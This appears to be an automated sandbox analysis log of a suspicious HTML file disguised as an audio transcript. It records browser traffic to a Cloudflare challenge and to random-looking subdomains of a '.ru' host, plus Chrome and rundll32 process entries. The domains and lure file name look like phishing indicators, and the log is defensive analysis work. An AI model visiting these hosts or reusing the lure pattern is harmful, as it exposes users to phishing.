                                                            24192.168.2.1649740104.18.95.414436828C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 20:29:07 UTC599OUTGET /cdn-cgi/challenge-platform/h/g/flow/ov1/1660689700:1736278100:0ZQQSFYZPedfX4O_ZYTMwMWkRQdIEiHqnm_WVkeJqJc/8fe6b271e95a19cb/b1kyRIitPK7rAruZNHAEw1s0NrT3tJg6Z9P4eP.Z10E-1736281735-1.1.1.1-P2cVOniWS7c.B83YFhJ3BYHkTauv6gJpPKSU9cTM8LlbLUtTtzE5a_PbshBTYIpL HTTP/1.1
                                                            Host: challenges.cloudflare.com
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 20:29:07 UTC379INHTTP/1.1 404 Not Found
                                                            Date: Tue, 07 Jan 2025 20:29:07 GMT
                                                            Content-Type: application/json
                                                            Content-Length: 7
                                                            Connection: close
                                                            cf-chl-out: GB+ulrt/KxtKg7ZyFPVkqwQeA1c/JQEXKxg=$n2h7QNcZjQCptsvk
                                                            cache-control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0
                                                            Server: cloudflare
                                                            CF-RAY: 8fe6b2bc1db0c466-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            2025-01-07 20:29:07 UTC7INData Raw: 69 6e 76 61 6c 69 64
                                                            Data Ascii: invalid


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            25192.168.2.1649741188.114.97.34436828C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 20:29:07 UTC664OUTGET /YULERXbYBwUsYhyGuZXUZcAVbsVxoYXKQBUFUBSAVTBCBNBCRLRNESWSNFB HTTP/1.1
                                                            Host: thmkl2jbjniwvjhtsmk1q8sogxlzypjlbn9ptrvqdhbav932njvufzrobyfk.expritraw.ru
                                                            Connection: keep-alive
                                                            sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                            sec-ch-ua-mobile: ?0
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            sec-ch-ua-platform: "Windows"
                                                            Accept: */*
                                                            Origin: https://brh5.bughtswo.com
                                                            Sec-Fetch-Site: cross-site
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Referer: https://brh5.bughtswo.com/
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 20:29:08 UTC901INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 20:29:08 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Access-Control-Allow-Origin: *
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=LNQCP5dkCiY19A5NQ%2FsiA8JXznTqJYv%2BC5%2Fu0gWlDY%2B30938OINlHojIr4OtssKwEtV0MQuo7oJ0otXJbIMMo%2Bret7gBhTg2izdNcICALd6%2BKeD51MdU3uu5EmCloJNNqMb2yih%2Br7QbGd6lyrzb2pnbitMakWrgimlRBfFeM22eXjMRNT75SrZxdJc660MnwOVzVbVNIjmVCjWl"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8fe6b2bc09b40f78-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1683&min_rtt=1494&rtt_var=938&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2829&recv_bytes=1242&delivery_rate=970744&cwnd=220&unsent_bytes=0&cid=5f82c6590be44825&ts=784&x=0"
                                                            2025-01-07 20:29:08 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                            Data Ascii: 11
                                                            2025-01-07 20:29:08 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                            26192.168.2.1649745188.114.97.34436828C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            TimestampBytes transferredDirectionData
                                                            2025-01-07 20:29:09 UTC456OUTGET /YULERXbYBwUsYhyGuZXUZcAVbsVxoYXKQBUFUBSAVTBCBNBCRLRNESWSNFB HTTP/1.1
                                                            Host: thmkl2jbjniwvjhtsmk1q8sogxlzypjlbn9ptrvqdhbav932njvufzrobyfk.expritraw.ru
                                                            Connection: keep-alive
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                            Accept: */*
                                                            Sec-Fetch-Site: none
                                                            Sec-Fetch-Mode: cors
                                                            Sec-Fetch-Dest: empty
                                                            Accept-Encoding: gzip, deflate, br
                                                            Accept-Language: en-US,en;q=0.9
                                                            2025-01-07 20:29:10 UTC900INHTTP/1.1 200 OK
                                                            Date: Tue, 07 Jan 2025 20:29:10 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: close
                                                            Access-Control-Allow-Origin: *
                                                            cf-cache-status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3bcJ7BVAv8J5wDjxDjGcy0DQcG69jAAhBl4gBxsZA%2B%2FtXI9sDzY0dcqwP7OJvbeX5YlV3g4dENe2rp0CRP15RC95PuIttaNDvb%2FVOkFTnwE47Ii5uk2tzhkwir51wYrdlyRUQ3HWeHwlZVDsz2BomaJ%2FNc0f7A0OC9lc8LKf3AuvYkHWongIn2%2FhKMBpRPmUsYsW%2B3cK4Lyx7SWG"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8fe6b2c75cc542d3-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=1985&min_rtt=1714&rtt_var=836&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2828&recv_bytes=1034&delivery_rate=1703617&cwnd=246&unsent_bytes=0&cid=e0566bbdf849bfe7&ts=590&x=0"
                                                            2025-01-07 20:29:10 UTC6INData Raw: 31 0d 0a 31 0d 0a
                                                            Data Ascii: 11
                                                            2025-01-07 20:29:10 UTC5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Click to jump to process

                                                            Click to jump to process

                                                            Click to jump to process

                                                            Target ID:0
                                                            Start time:15:28:50
                                                            Start date:07/01/2025
                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument C:\Users\user\Desktop\audio.mp3_JasonhTranscript.html
                                                            Imagebase:0x7ff7f9810000
                                                            File size:3'242'272 bytes
                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:2
                                                            Start time:15:28:51
                                                            Start date:07/01/2025
                                                            Path:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2072 --field-trial-handle=1992,i,8920122697455249808,12015628893217446941,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                            Imagebase:0x7ff7f9810000
                                                            File size:3'242'272 bytes
                                                            MD5 hash:45DE480806D1B5D462A7DDE4DCEFC4E4
                                                            Has elevated privileges:true
                                                            Has administrator privileges:true
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:false

                                                            Target ID:14
                                                            Start time:15:30:34
                                                            Start date:07/01/2025
                                                            Path:C:\Windows\System32\rundll32.exe
                                                            Wow64 process (32bit):false
                                                            Commandline:C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
                                                            Imagebase:0x7ff663870000
                                                            File size:71'680 bytes
                                                            MD5 hash:EF3179D498793BF4234F708D3BE28633
                                                            Has elevated privileges:false
                                                            Has administrator privileges:false
                                                            Programmed in:C, C++ or other language
                                                            Reputation:high
                                                            Has exited:true

                                                            No disassembly